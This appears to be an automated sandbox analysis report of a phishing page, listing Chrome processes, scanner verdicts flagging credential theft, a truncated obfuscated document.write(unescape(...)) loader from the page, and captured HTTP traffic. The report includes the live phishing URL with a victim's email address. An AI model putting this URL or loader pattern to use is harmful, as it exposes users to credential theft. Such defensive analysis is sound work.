2024-11-21 08:54:33 UTC	494	IN	HTTP/1.1 200 OK Date: Thu, 21 Nov 2024 08:54:33 GMT Content-Type: text/xml Content-Length: 1399 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:47 GMT ETag: "0x8DC582BE1CC18CD" x-ms-request-id: 21476416-401e-00a3-1c88-3a8b09000000 x-ms-version: 2018-03-28 x-azure-ref: 20241121T085433Z-178bfbc474bv7whqhC1NYC1fg4000000016g00000000aba4 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-21 08:54:33 UTC	1399	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 30 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 6c 65 61 73 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 52 65 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701051" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Release.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenRe

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

Behavior

Click to jump to process

System Behavior

Analysis Process: chrome.exePID: 7112, Parent PID: 4024

General

Target ID:	1
Start time:	03:53:31
Start date:	21/11/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Imagebase:	0x7ff684c40000
File size:	3'242'272 bytes
MD5 hash:	5BBFA6CBDF4C254EB368D534F9E23C92
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Show Windows behavior

Chronological Activities

Analysis Process: chrome.exePID: 2672, Parent PID: 7112

General

Target ID:	3
Start time:	03:53:35
Start date:	21/11/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2252 --field-trial-handle=2196,i,16707748160804769795,8698117244156366985,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Imagebase:	0x7ff684c40000
File size:	3'242'272 bytes
MD5 hash:	5BBFA6CBDF4C254EB368D534F9E23C92
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Show Windows behavior

Chronological Activities

Analysis Process: chrome.exePID: 5844, Parent PID: 4024

General

Target ID:	4
Start time:	03:53:37
Start date:	21/11/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" "https://voyages-moinschers.fr/request/index.html?userid=viviane.beigbeder@idcom-france.com"
Imagebase:	0x7ff684c40000
File size:	3'242'272 bytes
MD5 hash:	5BBFA6CBDF4C254EB368D534F9E23C92
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Chronological Activities

Disassembly

⊘No disassembly

Source: https://voyages-moinschers.fr/request/index.html?userid=viviane.beigbeder@idcom-france.com	Avira URL Cloud: detection malicious, Label: malware
Source: https://voyages-moinschers.fr/request/index.html?userid=viviane.beigbeder@idcom-france.com	SlashNext: detection malicious, Label: Credential Stealing type: Phishing & Social usering

Source: https://voyages-moinschers.fr/request/index.html?userid=viviane.beigbeder@idcom-france.com	HTTP Parser: document.write( unescape( '%3C%68%65%61%64%3E%0A%20%20%20%20%20%20%20%20%3C%74%69%74%6C%65%
Source: https://voyages-moinschers.fr/request/index.html?userid=viviane.beigbeder@idcom-france.com	HTTP Parser: document.write( unescape( '%3C%68%65%61%64%3E%0A%20%20%20%20%20%20%20%20%3C%74%69%74%6C%65%

Source: global traffic	HTTP traffic detected: GET /v3/Delivery/Placement?pubid=da63df93-3dbc-42ae-a505-b34988683ac7&pid=310091&adm=2&w=1&h=1&wpx=1&hpx=1&fmt=json&cltp=app&dim=le&rafb=0&nct=1&pm=1&cfmt=text,image,poly&sft=jpeg,png,gif&topt=1&poptin=0&localid=w:068D482D-8F3B-78AE-DAA0-0C08B8FF2AE6&ctry=CH&time=20241121T085318Z&lc=en-CH&pl=en-CH,en-GB&idtp=mid&uid=d215e385-cdc6-4502-a974-fb4c5f95db96&aid=00000000-0000-0000-0000-000000000000&ua=WindowsShellClient%2F9.0.40929.0%20%28Windows%29&asid=4be5c8b1edf448e3bf1089f5e22c1f1d&ctmode=MultiSession&arch=x64&betaedgever=0.0.0.0&canedgever=0.0.0.0&cdm=1&cdmver=10.0.19041.1023&devedgever=0.0.0.0&devfam=Windows.Desktop&devform=Unknown&devosver=10.0.19045.2006&disphorzres=1280&dispsize=17.1&dispvertres=1024&isu=0&lo=594875&metered=false&nettype=ethernet&npid=sc-310091&oemName=VMware%2C%20Inc.&oemid=Public&ossku=Professional&rver=2&scmid=Public&smBiosDm=VMware20%2C1&stabedgever=117.0.2045.55&svcmpt=Red&svgtng=2&svtmexp=1699747200&svtmupd=1696486876&tl=2&tsu=594875&waasBldFlt=1&waasCfgExp=1&waasCfgSet=1&waasRetail=1&waasRing=&svoffered=0 HTTP/1.1Accept-Encoding: gzip, deflateX-SDK-CACHE: chs=0&imp=0&chf=0&ds=50543&fs=23594&sc=6Cache-Control: no-cacheMS-CV: CnMav3B/lka9YTYu.0User-Agent: WindowsShellClient/9.0.40929.0 (Windows)X-SDK-HWF: arm0,arm640,ble0,cmb0,cmf0,cmr0,dcb1,dcc1,dx91,dxa1,dxb1,gyr0,hce0,hdc0,hov0,hsa0,hss1,kbd1,m041,m060,m080,m120,m160,m200,m301,m751,mA01,mct0,mgn0,mic0,mrc0,mse1,mT01,nfc0,rs10,rs20,rs30,rs40,rs50,rs60,tch0,tel0,v010,v020,v040,x641,x860,x86a640,xbd0,xbo0,xbs0,xbx0,xgp0Host: arc.msn.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /v3/Delivery/Placement?pubid=da63df93-3dbc-42ae-a505-b34988683ac7&pid=338389&adm=2&w=1&h=1&wpx=1&hpx=1&fmt=json&cltp=app&dim=le&rafb=0&nct=1&pm=1&cfmt=text,image,poly&sft=jpeg,png,gif&topt=1&poptin=0&localid=w:068D482D-8F3B-78AE-DAA0-0C08B8FF2AE6&ctry=CH&time=20241121T085318Z&lc=en-CH&pl=en-CH,en-GB&idtp=mid&uid=d215e385-cdc6-4502-a974-fb4c5f95db96&aid=00000000-0000-0000-0000-000000000000&ua=WindowsShellClient%2F9.0.40929.0%20%28Windows%29&asid=3231c04cb2e542ad8ff0b98138491059&ctmode=MultiSession&arch=x64&betaedgever=0.0.0.0&canedgever=0.0.0.0&cdm=1&cdmver=10.0.19041.1023&devedgever=0.0.0.0&devfam=Windows.Desktop&devform=Unknown&devosver=10.0.19045.2006&disphorzres=1280&dispsize=17.1&dispvertres=1024&isu=0&lo=594875&metered=false&nettype=ethernet&npid=sc-338389&oemName=VMware%2C%20Inc.&oemid=Public&ossku=Professional&scmid=Public&smBiosDm=VMware20%2C1&stabedgever=117.0.2045.55&svcmpt=Red&svgtng=2&svtmexp=1699747200&svtmupd=1696486876&tl=2&tsu=594875&waasBldFlt=1&waasCfgExp=1&waasCfgSet=1&waasRetail=1&waasRing=&svoffered=0 HTTP/1.1Accept-Encoding: gzip, deflateX-SDK-CACHE: chs=0&imp=0&chf=0&ds=50543&fs=23594&sc=6Cache-Control: no-cacheMS-CV: CnMav3B/lka9YTYu.0User-Agent: WindowsShellClient/9.0.40929.0 (Windows)X-SDK-HWF: arm0,arm640,ble0,cmb0,cmf0,cmr0,dcb1,dcc1,dx91,dxa1,dxb1,gyr0,hce0,hdc0,hov0,hsa0,hss1,kbd1,m041,m060,m080,m120,m160,m200,m301,m751,mA01,mct0,mgn0,mic0,mrc0,mse1,mT01,nfc0,rs10,rs20,rs30,rs40,rs50,rs60,tch0,tel0,v010,v020,v040,x641,x860,x86a640,xbd0,xbo0,xbs0,xbx0,xgp0Host: arc.msn.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /request/index.html?userid=viviane.beigbeder@idcom-france.com HTTP/1.1Host: voyages-moinschers.frConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /rules/other-Win32-v19.bundle HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule224902v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120402v21s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120600v4s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120609v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120608v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /v3/Delivery/Placement?pubid=da63df93-3dbc-42ae-a505-b34988683ac7&pid=280815&adm=2&w=1&h=1&wpx=1&hpx=1&fmt=json&cltp=app&dim=le&rafb=0&nct=1&pm=1&cfmt=text,image,poly&sft=jpeg,png,gif&topt=1&poptin=0&localid=w:068D482D-8F3B-78AE-DAA0-0C08B8FF2AE6&ctry=CH&time=20241121T085340Z&lc=en-CH&pl=en-CH,en-GB&idtp=mid&uid=d215e385-cdc6-4502-a974-fb4c5f95db96&aid=00000000-0000-0000-0000-000000000000&ua=WindowsShellClient%2F9.0.40929.0%20%28Windows%29&asid=cd56d114a28c43d1a3bf228764877a3a&ctmode=MultiSession&arch=x64&betaedgever=0.0.0.0&canedgever=0.0.0.0&cdm=1&cdmver=10.0.19041.1023&devedgever=0.0.0.0&devfam=Windows.Desktop&devform=Unknown&devosver=10.0.19045.2006&disphorzres=1280&dispsize=17.1&dispvertres=1024&isu=0&lo=594875&metered=false&nettype=ethernet&npid=sc-280815&oemName=dstkfa%2C%20Inc.&oemid=Public&ossku=Professional&scmid=Public&smBiosDm=dstkfa20%2C1&stabedgever=117.0.2045.55&svcmpt=Red&svgtng=2&svtmexp=1699747200&svtmupd=1696486876&tl=2&tsu=594875&waasBldFlt=1&waasCfgExp=1&waasCfgSet=1&waasRetail=1&waasRing=&svoffered=0 HTTP/1.1Accept-Encoding: gzip, deflateX-SDK-CACHE: chs=0&imp=0&chf=0&ds=50543&fs=23594&sc=6X-SDK-HW-TOKEN: t=EwDoAppeBAAUGoFunEzxzyai/T0i5tnZAAR1eX0AAWYBm1YhnWoZBXbxPqZv4jRbyYFHrXoCKR8yDlRnn5fz9cMrDvM+ENKhD58WblGKZvckPKo/wxPIBbNstb0a2ffybX7HLt0ANyVaSOF7yfazU1km1LRmAJImRCqRFOvbSeCgr9nGr4JJlK1g2kHWSY2n2Ux7l9qmifugenC5Seu7nro4iraU6TkR1XJDMLHsIcbGfec417uFzjU8iMpawtToPCYl8bkXGQiexGQckPwGJVuDOKlyRMvBKs4JFkcP4rplqE09bXs40pZZAjn6ud+JzDRRft/NA3aBoAlpWT2sXivcw68J8XKFlFMoxUE5ONabQJ3eLb0h2TwLTWSz3xAQZgAAEKv1bfM52QovIJZ/GlI490+wAQpNh6iykWToQrnRw42RSQRR2vToYZiMgaRsz8+HWayT7YDyUUGF5mPQKeC7ZqVynuoUKSicpivtnbK8YY29gjb8py/VJSCYapXVUNTpt+U/ZMWc7Rh1WqLwSwAoTLk1GG9d6J3V+IstiyJ1nIKrVdD0gfCd47wP+tQk52QFuqNaF0OWZoPysIPqnl3bZR36j38Q4BHn8wAIosGAWJezSujeaz2BOK3rmmBvbiFFP3WQgoNVTU5Q+knRmm05xYJyhkFMdcgPcoJQKbFKb+qdgnKrNKK2APbcM6UjSinyK9cEFv4OBLELc6I/SCh0DnWkFkx2Ip9ra1/chCzhKzSg6e//jPGbTVZYx1QvEgva4Jn3AG5hQl/xjki+lH0C6uVVnvUVc8f3zIQlz7/2wZTxIrPmKiKamR7lUygh/d5RHES89LP2Q6OOO5v3cLOVK6m7eSeOTH2+jTbOxJ2UPERUHiVzTvGBIbspCPanimX95zw30mLkwiJGvqisfX3NnSLJLgReXRwG7XofDs4LW5N1oV6IljwJqh6t/XlJBzxYOYajy4SNCWQot/zRBDO+AmAMudcB&p=Cache-Control: no-cacheMS-CV: SHdyyAU7fkyVYamz.0User-Agent: WindowsShellClient/9.0.40929.0 (Windows)X-SDK-HWF: arm0,arm640,ble0,cmb0,cmf0,cmr0,dcb1,dcc1,dx91,dxa1,dxb1,gyr0,hce0,hdc0,hov0,hsa0,hss1,kbd1,m041,m060,m080,m120,m160,m200,m301,m751,mA01,mct0,mgn0,mic0,mrc0,mse1,mT01,nfc0,rs10,rs20,rs30,rs40,rs50,rs60,tch0,tel0,v010,v020,v040,x641,x860,x86a640,xbd0,xbo0,xbs0,xbx0,xgp0Host: arc.msn.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /v3/Delivery/Placement?pubid=da63df93-3dbc-42ae-a505-b34988683ac7&pid=338387&adm=2&w=1&h=1&wpx=1&hpx=1&fmt=json&cltp=app&dim=le&rafb=0&nct=1&pm=1&cfmt=text,image,poly&sft=jpeg,png,gif&topt=1&poptin=0&localid=w:068D482D-8F3B-78AE-DAA0-0C08B8FF2AE6&ctry=CH&time=20241121T085340Z&lc=en-CH&pl=en-CH,en-GB&idtp=mid&uid=d215e385-cdc6-4502-a974-fb4c5f95db96&aid=00000000-0000-0000-0000-000000000000&ua=WindowsShellClient%2F9.0.40929.0%20%28Windows%29&asid=0809f47c32d84571a782a8378f879297&ctmode=MultiSession&arch=x64&betaedgever=0.0.0.0&canedgever=0.0.0.0&cdm=1&cdmver=10.0.19041.1023&devedgever=0.0.0.0&devfam=Windows.Desktop&devform=Unknown&devosver=10.0.19045.2006&disphorzres=1280&dispsize=17.1&dispvertres=1024&isu=0&lo=594875&metered=false&nettype=ethernet&npid=sc-338387&oemName=dstkfa%2C%20Inc.&oemid=Public&ossku=Professional&rver=2&sc-mode=0&scmid=Public&smBiosDm=dstkfa20%2C1&stabedgever=117.0.2045.55&svcmpt=Red&svgtng=2&svtmexp=1699747200&svtmupd=1696486876&tl=2&tsu=594875&waasBldFlt=1&waasCfgExp=1&waasCfgSet=1&waasRetail=1&waasRing=&svoffered=0 HTTP/1.1Accept-Encoding: gzip, deflateX-SDK-CACHE: chs=0&imp=0&chf=0&ds=50543&fs=23594&sc=6X-SDK-HW-TOKEN: t=EwDoAppeBAAUGoFunEzxzyai/T0i5tnZAAR1eX0AAWYBm1YhnWoZBXbxPqZv4jRbyYFHrXoCKR8yDlRnn5fz9cMrDvM+ENKhD58WblGKZvckPKo/wxPIBbNstb0a2ffybX7HLt0ANyVaSOF7yfazU1km1LRmAJImRCqRFOvbSeCgr9nGr4JJlK1g2kHWSY2n2Ux7l9qmifugenC5Seu7nro4iraU6TkR1XJDMLHsIcbGfec417uFzjU8iMpawtToPCYl8bkXGQiexGQckPwGJVuDOKlyRMvBKs4JFkcP4rplqE09bXs40pZZAjn6ud+JzDRRft/NA3aBoAlpWT2sXivcw68J8XKFlFMoxUE5ONabQJ3eLb0h2TwLTWSz3xAQZgAAEKv1bfM52QovIJZ/GlI490+wAQpNh6iykWToQrnRw42RSQRR2vToYZiMgaRsz8+HWayT7YDyUUGF5mPQKeC7ZqVynuoUKSicpivtnbK8YY29gjb8py/VJSCYapXVUNTpt+U/ZMWc7Rh1WqLwSwAoTLk1GG9d6J3V+IstiyJ1nIKrVdD0gfCd47wP+tQk52QFuqNaF0OWZoPysIPqnl3bZR36j38Q4BHn8wAIosGAWJezSujeaz2BOK3rmmBvbiFFP3WQgoNVTU5Q+knRmm05xYJyhkFMdcgPcoJQKbFKb+qdgnKrNKK2APbcM6UjSinyK9cEFv4OBLELc6I/SCh0DnWkFkx2Ip9ra1/chCzhKzSg6e//jPGbTVZYx1QvEgva4Jn3AG5hQl/xjki+lH0C6uVVnvUVc8f3zIQlz7/2wZTxIrPmKiKamR7lUygh/d5RHES89LP2Q6OOO5v3cLOVK6m7eSeOTH2+jTbOxJ2UPERUHiVzTvGBIbspCPanimX95zw30mLkwiJGvqisfX3NnSLJLgReXRwG7XofDs4LW5N1oV6IljwJqh6t/XlJBzxYOYajy4SNCWQot/zRBDO+AmAMudcB&p=Cache-Control: no-cacheMS-CV: SHdyyAU7fkyVYamz.0User-Agent: WindowsShellClient/9.0.40929.0 (Windows)X-SDK-HWF: arm0,arm640,ble0,cmb0,cmf0,cmr0,dcb1,dcc1,dx91,dxa1,dxb1,gyr0,hce0,hdc0,hov0,hsa0,hss1,kbd1,m041,m060,m080,m120,m160,m200,m301,m751,mA01,mct0,mgn0,mic0,mrc0,mse1,mT01,nfc0,rs10,rs20,rs30,rs40,rs50,rs60,tch0,tel0,v010,v020,v040,x641,x860,x86a640,xbd0,xbo0,xbs0,xbx0,xgp0Host: arc.msn.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /v3/Delivery/Placement?pubid=da63df93-3dbc-42ae-a505-b34988683ac7&pid=338388&adm=2&w=1&h=1&wpx=1&hpx=1&fmt=json&cltp=app&dim=le&rafb=0&nct=1&pm=1&cfmt=text,image,poly&sft=jpeg,png,gif&topt=1&poptin=0&localid=w:068D482D-8F3B-78AE-DAA0-0C08B8FF2AE6&ctry=CH&time=20241121T085340Z&lc=en-CH&pl=en-CH,en-GB&idtp=mid&uid=d215e385-cdc6-4502-a974-fb4c5f95db96&aid=00000000-0000-0000-0000-000000000000&ua=WindowsShellClient%2F9.0.40929.0%20%28Windows%29&asid=9502a067c1d54f728de9327c33815794&ctmode=MultiSession&arch=x64&betaedgever=0.0.0.0&canedgever=0.0.0.0&cdm=1&cdmver=10.0.19041.1023&devedgever=0.0.0.0&devfam=Windows.Desktop&devform=Unknown&devosver=10.0.19045.2006&disphorzres=1280&dispsize=17.1&dispvertres=1024&isu=0&lo=594875&metered=false&nettype=ethernet&npid=sc-338388&oemName=dstkfa%2C%20Inc.&oemid=Public&ossku=Professional&rver=2&scmid=Public&smBiosDm=dstkfa20%2C1&stabedgever=117.0.2045.55&svcmpt=Red&svgtng=2&svtmexp=1699747200&svtmupd=1696486876&tl=2&tsu=594875&waasBldFlt=1&waasCfgExp=1&waasCfgSet=1&waasRetail=1&waasRing=&svoffered=0 HTTP/1.1Accept-Encoding: gzip, deflateX-SDK-CACHE: chs=0&imp=0&chf=0&ds=50543&fs=23594&sc=6X-SDK-HW-TOKEN: t=EwDoAppeBAAUGoFunEzxzyai/T0i5tnZAAR1eX0AAWYBm1YhnWoZBXbxPqZv4jRbyYFHrXoCKR8yDlRnn5fz9cMrDvM+ENKhD58WblGKZvckPKo/wxPIBbNstb0a2ffybX7HLt0ANyVaSOF7yfazU1km1LRmAJImRCqRFOvbSeCgr9nGr4JJlK1g2kHWSY2n2Ux7l9qmifugenC5Seu7nro4iraU6TkR1XJDMLHsIcbGfec417uFzjU8iMpawtToPCYl8bkXGQiexGQckPwGJVuDOKlyRMvBKs4JFkcP4rplqE09bXs40pZZAjn6ud+JzDRRft/NA3aBoAlpWT2sXivcw68J8XKFlFMoxUE5ONabQJ3eLb0h2TwLTWSz3xAQZgAAEKv1bfM52QovIJZ/GlI490+wAQpNh6iykWToQrnRw42RSQRR2vToYZiMgaRsz8+HWayT7YDyUUGF5mPQKeC7ZqVynuoUKSicpivtnbK8YY29gjb8py/VJSCYapXVUNTpt+U/ZMWc7Rh1WqLwSwAoTLk1GG9d6J3V+IstiyJ1nIKrVdD0gfCd47wP+tQk52QFuqNaF0OWZoPysIPqnl3bZR36j38Q4BHn8wAIosGAWJezSujeaz2BOK3rmmBvbiFFP3WQgoNVTU5Q+knRmm05xYJyhkFMdcgPcoJQKbFKb+qdgnKrNKK2APbcM6UjSinyK9cEFv4OBLELc6I/SCh0DnWkFkx2Ip9ra1/chCzhKzSg6e//jPGbTVZYx1QvEgva4Jn3AG5hQl/xjki+lH0C6uVVnvUVc8f3zIQlz7/2wZTxIrPmKiKamR7lUygh/d5RHES89LP2Q6OOO5v3cLOVK6m7eSeOTH2+jTbOxJ2UPERUHiVzTvGBIbspCPanimX95zw30mLkwiJGvqisfX3NnSLJLgReXRwG7XofDs4LW5N1oV6IljwJqh6t/XlJBzxYOYajy4SNCWQot/zRBDO+AmAMudcB&p=Cache-Control: no-cacheMS-CV: SHdyyAU7fkyVYamz.0User-Agent: WindowsShellClient/9.0.40929.0 (Windows)X-SDK-HWF: arm0,arm640,ble0,cmb0,cmf0,cmr0,dcb1,dcc1,dx91,dxa1,dxb1,gyr0,hce0,hdc0,hov0,hsa0,hss1,kbd1,m041,m060,m080,m120,m160,m200,m301,m751,mA01,mct0,mgn0,mic0,mrc0,mse1,mT01,nfc0,rs10,rs20,rs30,rs40,rs50,rs60,tch0,tel0,v010,v020,v040,x641,x860,x86a640,xbd0,xbo0,xbs0,xbx0,xgp0Host: arc.msn.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: /Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
Source: global traffic	HTTP traffic detected: GET /s2/favicons?domain=idcom-france.com HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIlqHLAQj6mM0BCIWgzQEIucrNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://voyages-moinschers.fr/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /rules/rule120613v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120612v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120611v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120610v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120614v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /th?id=OADD2.10239359720591_10PHTLBML42K6TRZO&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=24&h=24&dynsize=1&qlt=90 HTTP/1.1Accept: /Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045Host: www.bing.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /rules/rule120615v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120617v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120616v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120618v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120619v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /th?id=OADD2.10239370639330_1D80T5H13WVAODNQ8&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/1.1Accept: /Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045Host: tse1.mm.bing.netConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /th?id=OADD2.10239370639329_16GDTY03HO5SY2UBG&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/1.1Accept: /Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045Host: tse1.mm.bing.netConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /th?id=OADD2.10239394186284_1SPGPKBFTZ4EQ1P55&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/1.1Accept: /Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045Host: tse1.mm.bing.netConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /th?id=OADD2.10239394186277_1DEATIZYUGUDBFQ4X&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/1.1Accept: /Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045Host: tse1.mm.bing.netConnection: Keep-Alive
